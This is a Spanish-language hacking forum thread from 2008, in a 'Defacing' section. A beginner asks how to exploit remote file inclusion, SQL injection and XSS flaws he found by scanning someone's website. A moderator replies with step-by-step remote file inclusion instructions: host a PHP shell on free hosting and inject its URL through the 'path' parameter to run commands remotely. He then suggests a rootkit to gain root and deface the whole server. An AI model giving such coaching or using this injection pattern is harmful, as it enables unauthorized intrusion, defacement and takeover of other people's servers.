Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 24, 2008, 09:17:06
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Help con la explotacion de estas "Vulnerabilidades" 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Help con la explotacion de estas "Vulnerabilidades"  (Leído 196 veces)
skullmaster-Back-
Visitante
« en: Febrero 03, 2008, 05:03:26 »
bueno como estoy comenzando en este de los defacing, pues necesito vuestra ayuda, escanee una pagina web y me dio estas dos vulne.

Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

y

phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities

bueno a ver si me podian decir que exploit utilizar o que programa o cosa utilizar!XD igual estare buscando en internet! Tongue espero que me ayuden! Tongue

Salu2's! Cool
En línea
The Shadow
Moderación
Colaborador
*****
Desconectado Desconectado

Mensajes: 754


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #1 en: Febrero 03, 2008, 07:43:05 »
weno man ... lo primero q te dice :

Cita de: skullmaster123 en Febrero 03, 2008, 05:03:26
Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

pos .... es vulnerable a atakes RFI ... si sabes usar esta tecnica usala .. sino ... busk info en la web

en cuanto a lo segundo :

Cita de: skullmaster123 en Febrero 03, 2008, 05:03:26
phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities

te dice q es vulnerable a atakes XSS ... = si sabes la tecnik .. usala ... sino ... busca en la web ..XD

PD: cualquier duda .... postea!

Saludos!
En línea




Reglamento del Foro     Linux  Registered User #473016
skullmaster-Back-
Visitante
« Respuesta #2 en: Febrero 03, 2008, 07:51:40 »
si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:

SQL Injection tambien eso significa que tambien es vulnerable a esta no??

Salu2's! Cool
En línea
ManCuerTex (ViPeR)
Moderador Global
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1649


Cuando el respeto se pierde... muere la magia


Ver Perfil WWW
« Respuesta #3 en: Febrero 04, 2008, 03:10:26 »
Cita de: skullmaster123 en Febrero 03, 2008, 07:51:40
si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:

SQL Injection tambien eso significa que tambien es vulnerable a esta no??

Salu2's! Cool

Si.

La primera es sencilla de realizar, postea los pasos a seguir que haces y pon lo que no consigues.
En esta misma sección tienes manuales de estas 3 técnicas.


Saludos,
En línea

Y Es Que Estas Preciosa Hasta Cuando Estás Dormida Mujer...
Reto HacK v.1 (Wargame)
Hacking Empezando desde 0
Haz Crecer Con Tu Visita La Mini Ciudad de El-Hacker.com!!
Próximamente Reto HacK v.2... (Finalizado!![Revisando code])
Si encuentras un tema dañado envíame un IM
skullmaster-Back-
Visitante
« Respuesta #4 en: Febrero 04, 2008, 11:31:39 »
ok gracias, lei pero no encuentro la manera de hacerlo, lei aja de que se explotaba por ejemplo:

path?=

o algo asi, claro hay mas pero tengo una pregunta, se puede explotar de esta forma, osea si contiene esta manera:

si vamos a inicio me da: index.php
si vamos a otro lugar me da: modules.php?name=Content&pa=showpage&pid=13
y otro: modules.php?name=Downloads

alguna manera o es posible explotar esa vulnerabilidad desde estos puntos? tambien estoy localizando el XSS...........
pero segun tengo entendido y leido la primera es la mas facil, pero se me ha hecho imposible!XD Tongue bueno seguire leyendo e intentando y se me dan su ayuda, pues mejor! Wink

Salu2's! Cool
En línea
ManCuerTex (ViPeR)
Moderador Global
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1649


Cuando el respeto se pierde... muere la magia


Ver Perfil WWW
« Respuesta #5 en: Febrero 04, 2008, 12:14:45 »
A ver te explico.

La vulnerabilidad te dice que está en index.php en la variable path.

Tienes que hacerte con una shell, aquí en esta sección seguro que encuentras muchas shells o alguna recopilación de shells.
Cuando tengas una shell de sistema en php, la guardarás como un archivo .txt y la subes a un hosting gratuito que tengas, tipo lycos o algo parecido, hasta que obtengamos una URL que nos lleve a nuestra shell.

Algo como lycos.es/skullmaster/shell.txt

Entonces abriríamos la página index.php y en la variable path le meteriamos nuestra shell, ya que tiene un fallo de seguridad y nos permite inyectar páginas y código a través de esa variable.

Quedaría algo como:
www.lokesea.com/index.php?path=http://lycos.es/skullmaster123/tushell.txt?

Eso te ejecutará la shell en remoto y podrás realizar cualquier acción de sistema.
Pero seguramente tendrás permisos de usuario, y querrás ser root, pero bueno para defacear esa página, con esos permisos ya podrás.

Si mas adelante te animas a defacear el server entero que seguro que contiene muchas páginas, deberás utilizar algun rootkit para conseguir ser root.


SAludos,
En línea

Y Es Que Estas Preciosa Hasta Cuando Estás Dormida Mujer...
Reto HacK v.1 (Wargame)
Hacking Empezando desde 0
Haz Crecer Con Tu Visita La Mini Ciudad de El-Hacker.com!!
Próximamente Reto HacK v.2... (Finalizado!![Revisando code])
Si encuentras un tema dañado envíame un IM
skullmaster-Back-
Visitante
« Respuesta #6 en: Febrero 04, 2008, 12:18:48 »
grax ya lo de la cuenta lycos lo hice ayer, voy a ver lo de la shell! Wink

Salu2's! Cool
En línea
[p3ll3]
Colaborador
*****
Desconectado Desconectado

Mensajes: 524

Read The Fucking Manual && STFU xDDD


Ver Perfil WWW
« Respuesta #7 en: Febrero 04, 2008, 03:05:45 »
Para lo de remote file inclusion creo que  "el Perro"  o  "Socket"  habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.


Saludos............ Cool
En línea


zix92
Moderación
Gran Colaborador
*****
Conectado Conectado

Mensajes: 1949


El Codigo es la Clave Ing. Inversa


Ver Perfil
« Respuesta #8 en: Febrero 04, 2008, 03:08:29 »
Cita de: [p3ll3] en Febrero 04, 2008, 03:05:45
Para lo de remote file inclusion creo que  "el Perro"  o  "Socket"  habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.


Saludos............ Cool

Bueno me tome la molesta de buscarlo sea por ayudar Grin

http://foro.el-hacker.com/index.php/topic,111464.0.html
En línea
[p3ll3]
Colaborador
*****
Desconectado Desconectado

Mensajes: 524

Read The Fucking Manual && STFU xDDD


Ver Perfil WWW
« Respuesta #9 en: Febrero 04, 2008, 03:23:43 »
 Wink ,eso es , esta bien !!!
En línea


Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Help con la explotacion de estas "Vulnerabilidades" « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC